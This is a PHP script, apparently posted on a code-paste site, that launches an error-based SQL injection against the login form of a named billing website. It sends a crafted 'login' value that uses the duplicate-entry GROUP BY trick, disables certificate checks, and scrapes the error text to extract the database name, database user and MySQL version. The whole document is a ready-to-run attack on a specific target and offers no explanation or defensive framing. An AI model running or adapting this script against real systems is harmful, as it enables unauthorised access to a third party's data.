php site https billing zugres net function query site query ch curl_in

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
$site = 'https://billing.zugres.net';
function query($site, $query) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $site,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false
));
curl_setopt_array($ch, array(
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array(
'card' => rand(100000, 999999),
'login' => "' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(($query), 1, 63), FLOOR(RAND(0)*2))) -- '",
'password' => '',
'act' => '1'
)
));
$res = iconv('koi8-r', 'UTF-8', curl_exec($ch));
preg_match('/Duplicate entry \'(.*?)\d\'/', $res, $data);
return $data[1];
}
$db = query($site, 'database()');
$user = query($site, 'user()');
$version = query($site, 'version()');
echo '<b>Host: </b> ' . $site . '<br/>';
echo '<b>Database: </b> ' . $db . '<br/>';
echo '<b>User: </b> ' . $user . '<br/>';
echo '<b>MySQL Version: </b> ' . $version . '<br/>';